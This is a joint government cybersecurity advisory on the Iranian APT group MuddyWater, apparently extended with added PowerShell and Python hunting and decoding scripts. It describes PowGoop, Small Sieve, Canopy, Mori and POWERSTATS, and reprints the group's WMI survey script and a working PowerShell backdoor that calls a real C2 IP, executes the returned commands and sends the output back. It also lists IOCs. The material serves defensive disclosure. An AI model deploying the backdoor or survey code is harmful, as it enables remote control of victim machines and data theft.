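    # Actions: 0 = Disabled, 1 = Block, 2 = Audit.
    $asrId = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
    $asrAction = $null
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref -and $pref.AttackSurfaceReductionRules_Ids) {
        $ids = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToLower() })
        $idx = [array]::IndexOf([string[]]$ids, $asrId)
        if ($idx -ge 0) { $asrAction = $pref.AttackSurfaceReductionRules_Actions[$idx] }
    }
    Add-Result 'ASR LSASS rule action' $asrAction ($asrAction -eq 1) "Set rule $asrId to Block (action 1)."

    # NTLM: LmCompatibilityLevel 5 = send NTLMv2 only and refuse LM/NTLM (script's own threshold).
    $lm = Get-RegistryValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'LmCompatibilityLevel'
    Add-Result 'LmCompatibilityLevel' $lm ($lm -ge 5) 'Set to 5 where applications allow; restrict NTLM further where possible.'

    # Built-in DefaultAccount (DSMA), the account the actors used for lateral movement.
    $def = Get-LocalUser -Name 'DefaultAccount' -ErrorAction SilentlyContinue
    $defEnabled = [bool]($def -and $def.Enabled)
    Add-Result 'DefaultAccount enabled' $defEnabled (-not $defEnabled) 'Disable DefaultAccount unless documented as required; monitor its logons.'

    return $results
}

Test-CredentialProtection | Format-Table -AutoSize
```

A value of $null in the Value column means the setting is not present at all, which for RunAsPPL and LmCompatibilityLevel is the same as not configured; only WDigest is treated as passing when absent, because modern Windows defaults it off.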

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.


Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks


Summary

Actions to Take Today to Protect Against Malicious Activity
* Search for indicators of compromise.
* Use antivirus software.
* Patch all systems.
* Prioritize patching known exploited vulnerabilities.
* Train users to recognize and report phishing attempts.
* Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.


Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 
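The PowGoop layout described above (a genuinely signed GoogleUpdate.exe placed somewhere Google Update does not normally live, with an unsigned Goopdate.dll, goopdate.dat and config.txt beside it) can be hunted for by file placement and signature rather than by hash. The script below is an added example (not from the advisory or the malware analysis report) that searches user-writable directories for GoogleUpdate.exe outside the real Google Update paths and reports the signature status of the executable and its companion DLL. The search roots and the pattern for legitimate Google directories are assumptions.

```powershell
# Added example (not from the advisory): hunt for the PowGoop file set
# described above, i.e. GoogleUpdate.exe outside the directories where the
# real Google Update is installed, together with goopdate.dll, goopdate.dat
# and config.txt next to it. Search roots and the "legitimate directory"
# pattern are assumptions. Run as administrator to read all user profiles.

function Find-PowGoopArtifacts {
    param([string[]]$Roots = @('C:\Users', 'C:\ProgramData', 'C:\Windows\Temp'))

    # Where Google Update really installs: Program Files or a user's AppData\Local.
    $legitPattern = '^[A-Za-z]:\\(Program Files( \(x86\))?|Users\\[^\\]+\\AppData\\Local)\\Google\\Update\\'
    $companions = 'goopdate.dll', 'goopdate.dat', 'config.txt'

    Get-ChildItem -Path $Roots -Filter 'GoogleUpdate.exe' -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.DirectoryName -notmatch $legitPattern } |
        ForEach-Object {
            $dir = $_.DirectoryName
            $exeSig = Get-AuthenticodeSignature -FilePath $_.FullName
            $dllPath = Join-Path $dir 'goopdate.dll'
            $dllSig = if (Test-Path $dllPath) { (Get-AuthenticodeSignature -FilePath $dllPath).Status } else { 'absent' }
            $present = @($companions | Where-Object { Test-Path (Join-Path $dir $_) })

            [pscustomobject]@{
                Path         = $_.FullName
                ExeSigner    = $exeSig.SignerCertificate.Subject
                ExeSigStatus = $exeSig.Status
                DllSigStatus = $dllSig
                Companions   = ($present -join ', ')
                # A signed loader beside a DLL that is not validly signed, plus the
                # .dat/.txt pair, is the side-loading layout the advisory describes.
                Suspicious   = ("$dllSig" -ne 'Valid') -and ($present.Count -ge 2)
            }
        }
}

Find-PowGoopArtifacts | Format-List
```

A hit with Suspicious set to True should be preserved (the directory copied, not just the executable) before any cleanup, because config.txt holds the beacon target and goopdate.dat the decryption stage, and both are needed to reconstruct what the loader was doing.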

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installer installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003].

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft’s Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., “Microsift”) and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using the Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027, T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0009] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori is a DLL written in C++ that is executed with regsvr32.exe through its DllRegisterServer export; the DLL appears to be a component of another program. FML.dll contains approximately 200 MB of junk data [T1001.001] in resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old, where FILENAME is the DLL’s own filename, and deletes a file referenced by a registry value.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and JavaScript Object Notation (JSON), based on certain key values passed to the JSON library functions; JSON is likely used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data in the Registry keys HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).

POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools, along with JavaScript files used to establish connections back to malicious infrastructure, to the malware aggregation tool and repository VirusTotal. Network operators who identify multiple instances of the tools on the same network should investigate further, as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

    # Operating system name (Win32_OperatingSystem.Name); every field is followed by the ";;" delimiter
    $O = Get-WmiObject Win32_OperatingSystem
    $S = $O.Name
    $S += ";;"
    # First address of every IP-enabled adapter, built as ", a, b" and then stripped of the leading comma
    $ips = ""
    Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % { $ips = $ips + ", " + $_.IPAddress[0] }
    $S += $ips.Substring(1)
    $S += ";;"
    # OS architecture, fully qualified hostname, AD domain, and the logged-on user
    $S += $O.OSArchitecture
    $S += ";;"
    $S += [System.Net.DNS]::GetHostByName('').HostName
    $S += ";;"
    $S += ((Get-WmiObject Win32_ComputerSystem).Domain)
    $S += ";;"
    $S += $env:UserName
    $S += ";;"
    # Display names of the antivirus products registered with Security Center
    $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername
    $resAnti = @()
    foreach ($AntiVirusProduct in $AntiVirusProducts) { $resAnti += $AntiVirusProduct.displayName }
    $S += $resAnti
    echo $S

Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater, shown below, encrypts its communications with adversary-controlled infrastructure using a single-byte Exclusive-OR (XOR) with the key 0x02. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

    # XOR every UTF-8 byte of $txt with $key, then Base64-encode (used for task output sent to the C2)
    function encode($txt, $key) {
        $enByte = [Text.Encoding]::UTF8.GetBytes($txt)
        for ($i = 0; $i -lt $enByte.Count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key }
        $encodetxt = [Convert]::ToBase64String($enByte)
        return $encodetxt
    }
    # Base64-decode, then XOR every byte with $key (used for tasking received from the C2)
    function decode($txt, $key) {
        $enByte = [System.Convert]::FromBase64String($txt)
        for ($i = 0; $i -lt $enByte.Count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key }
        $dtxt = [System.Text.Encoding]::UTF8.GetString($enByte)
        return $dtxt
    }
    $global:tt = 20   # beacon interval in seconds
    while ($true) {
        try {
            # Poll the C2 for tasking through the system proxy
            $w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
            $w.proxy = [Net.WebRequest]::GetSystemWebProxy()
            $r = (New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd()
            if ($r.Length -gt 0) {
                # Decode the response with key 0x02 and execute it as PowerShell
                $res = [string]$ExecutionContext.InvokeCommand.InvokeScript((decode $r 2))
                # Return the encoded output to the C2 in a "cookie" request header
                $wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
                $wr.proxy = [Net.WebRequest]::GetSystemWebProxy()
                $wr.Headers.Add('cookie', (encode $res 2))
                $wr.GetResponse().GetResponseStream()
            }
        } catch {}
        Start-Sleep -Seconds $global:tt
    }
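As an added example that is not part of the advisory, the Python below mirrors the backdoor's XOR-and-Base64 codec so that a captured poll/response pair can be decoded offline, and parses the ";;"-delimited string produced by the survey script above into named fields. The sample exchange and survey string are constructed for the example, not captured traffic, and the triage heuristic looks_like_xor_b64 is this editor's own suggestion for flagging "cookie" headers in proxy logs, not something the advisory describes.

```python
import base64
import binascii
import string

# Single-byte XOR key hardcoded in the backdoor ("decode $r 2" / "encode $res 2").
XOR_KEY = 0x02


def xor_b64_encode(text: str, key: int = XOR_KEY) -> str:
    """Mirror of the backdoor's encode(): UTF-8 bytes -> XOR every byte -> Base64."""
    return base64.b64encode(bytes(b ^ key for b in text.encode("utf-8"))).decode("ascii")


def xor_b64_decode(blob: str, key: int = XOR_KEY) -> str:
    """Mirror of the backdoor's decode(): Base64 -> XOR every byte -> UTF-8 text."""
    return bytes(b ^ key for b in base64.b64decode(blob)).decode("utf-8")


# Field order produced by the survey script; every value except the last is followed by ";;".
SURVEY_FIELDS = ("os", "ips", "arch", "hostname", "domain", "user", "av")


def parse_survey(survey: str) -> dict:
    """Split a ';;'-delimited survey string into named fields.

    'ips' becomes a list (the script builds ", a, b" and drops the first character).
    'av' is kept as text: PowerShell joins the AntiVirusProduct array with spaces,
    which cannot be split reliably when product names themselves contain spaces.
    """
    parts = survey.split(";;")
    if len(parts) != len(SURVEY_FIELDS):
        raise ValueError(f"expected {len(SURVEY_FIELDS)} fields, got {len(parts)}")
    record = dict(zip(SURVEY_FIELDS, parts))
    record["ips"] = [ip.strip() for ip in record["ips"].split(",") if ip.strip()]
    return record


def decode_exchange(server_body: str, cookie_value: str) -> tuple:
    """Decode one poll/response round trip captured from the wire.

    server_body  - body of the C2's reply to GET /index.php?id=<victim identifier>
                   (the tasking the implant runs through InvokeScript after decoding)
    cookie_value - value of the 'cookie' request header on the follow-up request
                   (the task output, encoded with the same scheme)
    Returns (tasking_script, task_output).
    """
    return xor_b64_decode(server_body), xor_b64_decode(cookie_value)


def looks_like_xor_b64(cookie_value: str, key: int = XOR_KEY, min_printable: float = 0.95) -> bool:
    """Triage heuristic (editor's suggestion): does a 'cookie' header value decode to
    mostly printable text under this key? Ordinary cookies are not strict Base64 blobs
    that turn readable after XOR 0x02."""
    try:
        raw = base64.b64decode(cookie_value, validate=True)
    except (binascii.Error, ValueError):
        return False
    if not raw:
        return False
    decoded = bytes(b ^ key for b in raw)
    printable = sum(chr(b) in string.printable for b in decoded)
    return printable / len(decoded) >= min_printable


# --- Constructed sample exchange (not captured traffic) ---------------------------------
SAMPLE_SURVEY = (
    "Microsoft Windows 10 Pro|C:\\WINDOWS|\\Device\\Harddisk0\\Partition3;;"
    " 10.17.32.18, 192.168.56.10;;64-bit;;WS01.corp.example;;corp.example;;jdoe;;"
    "Windows Defender"
)
SAMPLE_TASK = "whoami"
SAMPLE_SERVER_BODY = xor_b64_encode(SAMPLE_TASK)    # what the C2 would send as tasking
SAMPLE_COOKIE = xor_b64_encode(SAMPLE_SURVEY)       # what the implant would send back

if __name__ == "__main__":
    task, output = decode_exchange(SAMPLE_SERVER_BODY, SAMPLE_COOKIE)
    print("tasking :", task)
    print("survey  :", parse_survey(output))
    print("xor/b64?:", looks_like_xor_b64(SAMPLE_COOKIE), looks_like_xor_b64("sessionid=abc123; theme=dark"))
```

Because the key is a single byte, the decode needs no key recovery: run decode_exchange over the response body and the outbound "cookie" header of any request to /index.php?id=… from the IOC list and the tasking reads out directly.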

MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title ID Use
Reconnaissance
Gather Victim Identity Information: Email Addresses T1589.002 MuddyWater has specifically targeted government agency employees with spearphishing emails.
Resource Development
Acquire Infrastructure: Web Services T1583.006 MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool T1588.002 MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.
Initial Access
Phishing: Spearphishing Attachment T1566.001 MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. 
Phishing: Spearphishing Link T1566.002 MuddyWater has sent targeted spearphishing emails with malicious links.
Execution
Windows Management Instrumentation T1047 MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell T1059.001 MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell T1059.003 MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic T1059.005 MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python T1059.006 MuddyWater has developed tools in Python, including Out1. 
Command and Scripting Interpreter: JavaScript T1059.007 MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution T1203 MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link T1204.001 MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File T1204.002 MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model T1559.001 MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange T1559.002 MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
Persistence
Scheduled Task/Job: Scheduled Task T1053.005 MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros T1137.001 MuddyWater has used a Word Template, Normal.dotm, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 MuddyWater has added the Registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. 
Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control  T1548.002 MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores T1555 MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Password Stores: Credentials from Web Browsers T1555.003 MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
Defense Evasion
Obfuscated Files or Information T1027 MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography T1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Delivery T1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location T1036.005 MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information T1140 MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP T1218.003 MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta T1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 T1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrails T1480 The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools T1562.001 MuddyWater can disable the system’s local proxy settings.
Credential Access
OS Credential Dumping: LSASS Memory T1003.001 MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets T1003.004 MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials T1003.005 MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files T1552.001 MuddyWater has run a tool that steals passwords saved in victim email.
Discovery 
System Network Configuration Discovery T1016 MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery T1033 MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery T1049 MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery T1057 MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery T1082 MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery T1083 MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords “Kasper,” “Panda,” or “ESET.”
Account Discovery: Domain Account T1087.002 MuddyWater has used cmd.exe net user /domain to enumerate domain users.
Software Discovery T1518 MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery T1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
Collection
Screen Capture T1113 MuddyWater has used malware that can capture screenshots of the victim’s machine.

Archive Collected Data: Archive via Utility T1560.001 MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.
Command and Control
Application Layer Protocol: Web Protocols T1071.001 MuddyWater has used HTTP for C2 communications; e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy T1090.002 MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has also used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication T1102.002 MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels T1104 MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer T1105 MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding T1132.001 MuddyWater has used tools to encode C2 communications including Base64 encoding.
Data Encoding: Non-Standard Encoding T1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software  T1219 MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
Exfiltration
Exfiltration Over C2 Channel T1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.

Mitigations

Protective Controls and Architecture

  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 

Identity and Access Management

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 

Phishing Protection

  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 

Vulnerability and Configuration Management

Additional Resources

  • For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories and CNMF’s press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.

References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

5.199.133[.]149
45.142.213[.]17    
45.142.212[.]61
45.153.231[.]104 
46.166.129[.]159 
80.85.158[.]49 
87.236.212[.]22
88.119.170[.]124 
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228 
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248 
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128

Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: gram_app.exe Metadata

Filename gram_app.exe 
Description NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key 
Size 16999598 bytes 
MD5 15fa3b32539d7453a9a85958b77d4c95 
SHA-1 11d594f3b3cf8525682f6214acb7b7782056d282 
SHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 
Compile Time 2021-09-25 21:57:46 UTC 

Table 3: Index.exe Metadata

Filename  index.exe 
Description The final PyInstaller-bundled Python 3.9 backdoor 
Size 17263089 bytes 
MD5 5763530f25ed0ec08fb26a30c04009f1 
SHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992 
SHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2  
Compile Time 2021-08-01 04:39:46 UTC 

Functionality 

Installation 

Small Sieve is distributed as a large (16 MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData\Roaming directory and is added as a Run key in the registry to enable persistence after reboot. 

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field  Value Description
Chat ID 2090761833  This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. 
